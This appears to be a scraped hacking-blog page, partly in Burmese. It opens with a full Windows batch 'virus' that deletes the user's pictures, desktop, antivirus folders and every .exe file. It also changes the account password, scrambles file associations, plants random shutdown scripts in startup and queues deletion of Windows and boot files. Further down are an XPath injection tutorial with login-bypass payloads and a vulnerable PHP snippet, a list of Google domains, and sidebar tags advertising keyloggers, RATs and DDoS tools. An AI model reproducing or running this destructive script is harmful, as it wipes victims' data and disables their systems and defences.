cd "%userprofile%\desktop" >nul
attrib +a +s +r +h >nul
// delete my pictures
del /f /q '%userprofile%\My Pictures\*.*' >nul
--------------------------------------------------
cls
echo Please be patience, this will take a moment.
echo loading.
ping localhost -n 2 >nul
cls
--------------------------------------------------
del /f /q '%userprofile%\My Pictures\*.*' >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading..
ping localhost -n 2 >nul
cls
--------------------------------------------------
//deletes desktop (not sure if it works)
del "%userprofile%\desktop" >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading...
ping localhost -n 2 >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading
ping localhost -n 2 >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading.
ping localhost -n 2 >nul
cls
--------------------------------------------------
//changes the user's password
net user %username% Troopzz >nul
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading..
ping localhost -n 2 >nul
cls
--------------------------------------------------
echo Please be patience, this will take a moment.
echo loading...
ping localhost -n 2>nul
cls
--------------------------------------------------
echo All files is now complete
ping localhost -n 3 >nul
cls
--------------------------------------------------
echo The virus you just downloaded is now activate. shuting down computer in:
ping localhost -n 4>nul
echo 2.
cls
--------------------------------------------------
//confuser (changing shit)
assoc .dll=txtfile >nul
assoc .exe=pngfile >nul
assoc .vbs=Visual Style >nul
assoc .reg=xmlfile >nul
assoc .txt=regfile >nul
assoc .mp3=txtfile >nul
assoc .xml=txtfile >nul
assoc .png=txtfile >nul
assoc .jpg=txtfile >nul
assoc .mp3=regfile >nul
--------------------------------------------------
echo The virus you just downloaded is now activate. shuting down computer in:
echo 1.
ping localhost -n 1>nul
--------------------------------------------------
//antivirus delete
del /Q /F C:\Program Files\alwils~1\avast4\*.* >nul
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe >nul
del /Q /F C:\Program Files\kasper~1\*.exe >nul
del /Q /F C:\Program Files\trojan~1\*.exe >nul
del /Q /F C:\Program Files\f-prot95\*.dll >nul
del /Q /F C:\Program Files\tbav\*.dat >nul
del /Q /F C:\Program Files\avpersonal\*.vdf >nul
del /Q /F C:\Program Files\Norton~1\*.cnt >nul
del /Q /F C:\Program Files\Mcafee\*.* >nul
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* >nul
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* >nul
del /Q /F C:\Program Files\Norton~1\Norton~1\*.* >nul
del /Q /F C:\Program Files\Norton~1\*.* >nul
del /Q /F C:\Program Files\avgamsr\*.exe >nul
del /Q /F C:\Program Files\avgamsvr\*.exe >nul
del /Q /F C:\Program Files\avgemc\*.exe >nul
del /Q /F C:\Program Files\avgcc\*.exe >nul
del /Q /F C:\Program Files\avgupsvc\*.exe >nul
del /Q /F C:\Program Files\grisoft >nul
del /Q /F C:\Program Files\nood32krn\*.exe >nul
del /Q /F C:\Program Files\nood32\*.exe >nul
del /Q /F C:\Program Files\nod32 >nul
del /Q /F C:\Program Files\nood32 >nul
del /Q /F C:\Program Files\kav\*.exe >nul
del /Q /F C:\Program Files\kavmm\*.exe >nul
del /Q /F C:\Program Files\kaspersky\*.* >nul
del /Q /F C:\Program Files\ewidoctrl\*.exe >nul
del /Q /F C:\Program Files\guard\*.exe >nul
del /Q /F C:\Program Files\ewido\*.exe >nul
del /Q /F C:\Program Files\pavprsrv\*.exe >nul
del /Q /F C:\Program Files\pavprot\*.exe >nul
del /Q /F C:\Program Files\avengine\*.exe >nul
del /Q /F C:\Program Files\apvxdwin\*.exe >nul
del /Q /F C:\Program Files\webproxy\*.exe >nul
del /Q /F C:\Program Files\panda software\*.* >nul
//delete all .exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
//spreading a shutdown virus (the random is any number between 0 and 32000) so you better be lucky..
echo shutdown -f -t %random% >>0x00f.bat
echo shutdown -f -t %random% >>0x00f.bat
echo shutdown -f -t %random% >>0x00f.bat
echo shutdown -f -t %random% >>0x00f.bat
//creating random batchs with random shutdown
cd "C:\documents and settings\all users\start menu\programs\startup" >nul
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
echo shutdown -f -t %random% >>%random%.bat
// delete time
cd "C:\documents and settings\all users\start menu\programs\startup" >nul
echo del c:\windows >>0x00f
echo del c:\program files >>0x00f
echo del c:\documents and settings >>0x00f
echo del f:\ >>0x00f
echo del d:\ >>0x00f
echo del c:\autoexec.bat >>0x00f
echo del c:\boot.ini >>0x00f
echo del c:\ntldr >>0x00f
echo del c:\windows\win.ini >>0x00f
echo attrib -r -s -h c:\autoexec.bat >>0x00f
echo attrib -r -s -h c:\boot.ini >>0x00f
echo attrib -r -s -h c:\ntldr >>0x00f
echo attrib -r -s -h c:\windows\win.ini >>0x00f
//copy the batch file to startup
--------------------------------------------------
set startup=copy %0 "C:\Documents and Settings/%username%/Start Menu/Programs/Startup" >nul
copy "0x00f.bat" "C:\documents and settings\%username%\start menu\programs\startup" >nul
cd "C:\documents and settings\all users\start menu\programs\startup" >nul
attrib +a +s +r +h >nul
cls
--------------------------------------------------

//shutdown
shutdown -f -t 3 -c "shwekoyantaw"


power by uhackme

Read More ->>

Local File Inclusion Tutorial




Chapter 1 : What is LFI & Understanding LFI
1.1. What is LFI………………………………………………………………….Page 5
1.2. Understanding LFI……………………………………………………Page 5
1.3. How to Find LFI Vulnerabilities?……………………..Page 7
Chapter 2 : How they Hack?
2.1. Normal Technique…………………………………………………………..Page 9
2.2. Log Poisoning…………………………………………………………………..Page 10
2.3. The proc/self/environ Method……………………………Page 11
Chapter 3 : Securing LFI Vulnerabilities
3.1. Securing LFI Vulnerabilities……………………………… Page 14
References …………………………………………… Page 15

ghost Area ေရးတာကိုကၽြန္ေတာ္ေကာက္တင္ေပးတာ ဟီးသူ႕ကိုအဓိကေက်းဇူးတင္ပါတယ္လို႕ပဲေျပာ
ခ်င္ပါေၾကာင္း..............။

Download
Download
Read More ->>

XPath Injection Tutorial



What is XPath Injection? 


 Webiste တစ္ခုရဲ႕ အေရးၾကီး Data ေတြကို သိမ္းဆည္းဖို႕ XML Document ေတြကို အသံုးျပဳေလ့ရွိၾကပါတယ္။ ဥပမာ . User Information ေတြ User Password ေတြေပါ့.XML Document ေတြရဲ႕အားသာခ်က္ကေတာ့ လူေတြဖတ္ရခက္တာပါပဲ. အဲ့ဒီ့ Data Base ေတြကို ခ်ိတ္ဖို႕ Xpath ( XPath Language ) ကိုအသံုးျပဳပါတယ္။ Xpath Injection ဆိုတာ ယင္း Data Base အတြင္းသို႕ By Pass လုပ္ဖို႕ၾကိဳးစားျခင္းပါပဲ.  


How XPath Work?
ပထမဆံုး User ရဲ႕ အေရးၾကီး Data Base မ်ားသိမ္းဆည္းထားေသာ XML Document တစ္ခုကို အရင္ၾကည့္ရေအာင္.။ 
<?xml version=”1.0″ encoding=”ISO-8859-1″?>
<Ghostarea_database>
<Ghostarea_user>
<username>Negative.Thunder</username>
<password>Ilovehacking</password>
<account>Administrator</account>
</Ghostarea_user>
<Ghostarea_user>
<username>Unknown</username>
<password>test1234</password>
<account>Subscriber</account>
</Ghostarea_user>
<Ghostarea_user>
<username>Anonymous</username>
<password>test123</password>
<account>Subscriber</account>
</Ghostarea_user>
</Ghostarea_database>
အေပၚကဟာကေတာ့ User Information မ်ားသိမ္းဆည္းထားေသာ XML Data base File ပါ. အကယ္၍ ကၽြန္ေတာ္တို႕က Administrator အေကာင့္ရဲ႕ Information ကိုယူမယ္ဆိုပါစို႕ ဒါဆို XML Document နဲ႕ခ်ိတ္ဖို႕ XPath Query ကို ဒီလိုေရးပါ့မယ္
string(//Ghostarea_user[username/text()='Negative.Thunder' and password/text()='ilovehacking']/account/text())
အထက္ကအတုိင္းဆိုျပႆနာမရွိပါဘူး ဒါေပမယ့္ Web Master ကမ်ား User Input ကို Filter လုပ္မထားပဲ ေအာက္ကလိုေရးလိုက္မယ္ဆိုရင္
string(//Ghostarea_user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())
Attacker ဟာ By Pass Access လုပ္ႏုိင္ပါျပီ.
Username: ‘ or ’1′ = ’1
Password: ‘ or ’1′ = ’1
ဒါဆို Attacker ဟာ Access လုပ္ႏုိင္ပါျပီ ( Simple SQL Injection Attack ) လိုပါပဲ..သူကလည္း ဒီလိုနည္းနဲ႕ပဲေပါက္သြားတာပါ  ;-)
Note : ခုနက XMP Document နဲ႕ XPath ကိုပဲျပသြားလုိက္ပါတယ္ Exploit Code ေနရာမွာ တကယ့္ Login Page ကေတာ့ ဒီလိုပါ.

<?php
$login = simplexml_load_file(“Ghostarea_database.xml”);
$result=$login->xpath(“//Ghostarea_user[username/test()='".$_POST['Ghostarea'].” AND password/text()=’”.$_POST['testing123'].”‘”;
?>

Ref : Hackloops 

power by ghostarea
Read More ->>

Thursday, February 16, 2012

List of All Google Domains

URL

Country

1 www.google.ad Andorra
2 www.google.ae الامارات العربية المتحدة
3 www.google.com.af افغانستان
4 www.google.com.ag Antigua and Barbuda
5 www.google.com.ai Anguilla
6 www.google.am Հայաստան
7 www.google.it.ao Angola
8 www.google.com.ar Argentina
9 www.google.as American Samoa
10 www.google.at Österreich
11 www.google.com.au Australia
12 www.google.az Azərbaycan
13 www.google.ba Bosna i Hercegovina
14 www.google.com.bd বাংলাদেশ
15 www.google.be België
16 www.google.bg България
17 www.google.com.bh البحرين
18 www.google.bi Burundi
19 www.google.com.bn Brunei
20 www.google.com.bo Bolivia
21 www.google.com.br Brasil
22 www.google.bs The Bahamas
23 www.google.co.bw Botswana
24 www.google.com.by Беларусь
25 www.google.com.bz Belize
26 www.google.ca Canada
27 www.google.cd Rep. Dem. du Congo
28 www.google.cg Rep. du Congo
29 www.google.ch Schweiz
30 www.google.ci Cote D’Ivoire
31 www.google.co.ck Cook Islands
32 www.google.cl Chile
33 www.google.cn 中国
34 www.google.com.co Colombia
35 www.google.co.cr Costa Rica
36 www.google.com.cu Cuba
37 www.google.cz Česká republika
38 www.google.de Deutschland
39 www.google.dj Djibouti
40 www.google.dk Danmark
41 www.google.dm Dominica
42 www.google.com.do Rep. Dominicana
43 www.google.com.ec Ecuador
44 www.google.ee Eesti
45 www.google.com.eg مصر
46 www.google.es España
47 www.google.com.et ኢትዮጵያ
48 www.google.fi Suomi
49 www.google.com.fj Fiji
50 www.google.fm Micronesia
51 www.google.fr France
52 www.google.ge საქართველო
53 www.google.gg Guernsey
54 www.google.com.gh Ghana
55 www.google.com.gi Gibraltar
56 www.google.gl Grønlands
57 www.google.gm The Gambia
58 www.google.gp Guadeloupe
59 www.google.gr Ελλάς
60 www.google.com.gt Guatemala
61 www.google.gy Guyana
62 www.google.com.hk 香港
63 www.google.hn Honduras
64 www.google.hr Hrvatska
65 www.google.ht Haïti
66 www.google.hu Magyarország
67 www.google.co.id Indonesia
68 www.google.ie Ireland
69 www.google.co.il ישראל
70 www.google.im Isle of Man
71 www.google.co.in India
72 www.google.is Ísland
73 www.google.it Italia
74 www.google.je Jersey
75 www.google.com.jm Jamaica
76 www.google.jo الأردن
77 www.google.co.jp 日本
78 www.google.co.ke Kenya
79 www.google.com.kh Hong Kong
80 www.google.ki Kiribati
81 www.google.kg Кыргызстан
82 www.google.co.kr 한국
83 www.google.kz Қазақстан
84 www.google.la ລາວ
85 www.google.li Liechtenstein
86 www.google.lk Sri Lanka
87 www.google.co.ls Lesotho
88 www.google.lt Lietuvos
89 www.google.lu Luxemburg
90 www.google.lv Latvija
91 www.google.com.ly ليبيــا
92 www.google.co.ma Maroc
93 www.google.md Moldova
94 www.google.mn Монгол улс
95 www.google.ms Montserrat
96 www.google.com.mt Malta
97 www.google.mu Mauritius
98 www.google.mv Maldives
99 www.google.mw Malawi
100 www.google.com.mx México
101 www.google.com.my Malaysia
102 www.google.com.na Namibia
103 www.google.com.nf Norfolk Island
104 www.google.com.ng Nigeria
105 www.google.com.ni Nicaragua
106 www.google.nl Nederland
107 www.google.no Norge
108 www.google.com.np नेपाल
109 www.google.nr Nauru
110 www.google.nu Niue
111 www.google.co.nz New Zealand
112 www.google.com.om عُمان
113 www.google.com.pa Panamá
114 www.google.com.pe Perú
115 www.google.com.ph Pilipinas
116 www.google.com.pk Pakistan
117 www.google.pl Polska
118 www.google.pn Pitcairn Islands
119 www.google.com.pr Puerto Rico
120 www.google.pt Portugal
121 www.google.com.py Paraguay
122 www.google.com.qa قطر
123 www.google.ro România
124 www.google.ru Россия
125 www.google.rw Rwanda
126 www.google.com.sa السعودية
127 www.google.com.sb Solomon Islands
128 www.google.sc Seychelles
129 www.google.se Sverige
130 www.google.com.sg Singapore
131 www.google.sh Saint Helena
132 www.google.si Slovenija
133 www.google.sk Slovensko
134 www.google.sn Sénégal
135 www.google.sm San Marino
136 www.google.st São Tomé e Príncipe
137 www.google.com.sv El Salvador
138 www.google.co.th ประเทศไทย
139 www.google.com.tj Tajikistan
140 www.google.tk Tokelau
141 www.google.tl Timor-Leste
142 www.google.tm Türkmenistan
143 www.google.to Tonga
144 www.google.com.tr Türkiye
145 www.google.tt Trinidad and Tobago
146 www.google.com.tw 台灣
147 www.google.com.ua Україна
148 www.google.co.ug Uganda
149 www.google.co.uk UK
150 www.google.com.uy Uruguay
151 www.google.co.uz O’zbekiston
152 www.google.com.vc Saint Vincent
153 www.google.co.ve Venezuela
154 www.google.vg British Virgin Islands
155 www.google.co.vi Virgin Islands
156 www.google.com.vn Việt Nam
157 www.google.vu Vanuatu
158 www.google.ws Samoa
159 www.google.rs Србија
160 www.google.co.za South Africa
161 www.google.co.zm Zambia
162 www.google.co.zw Zimbabwe
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Blog Archive

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology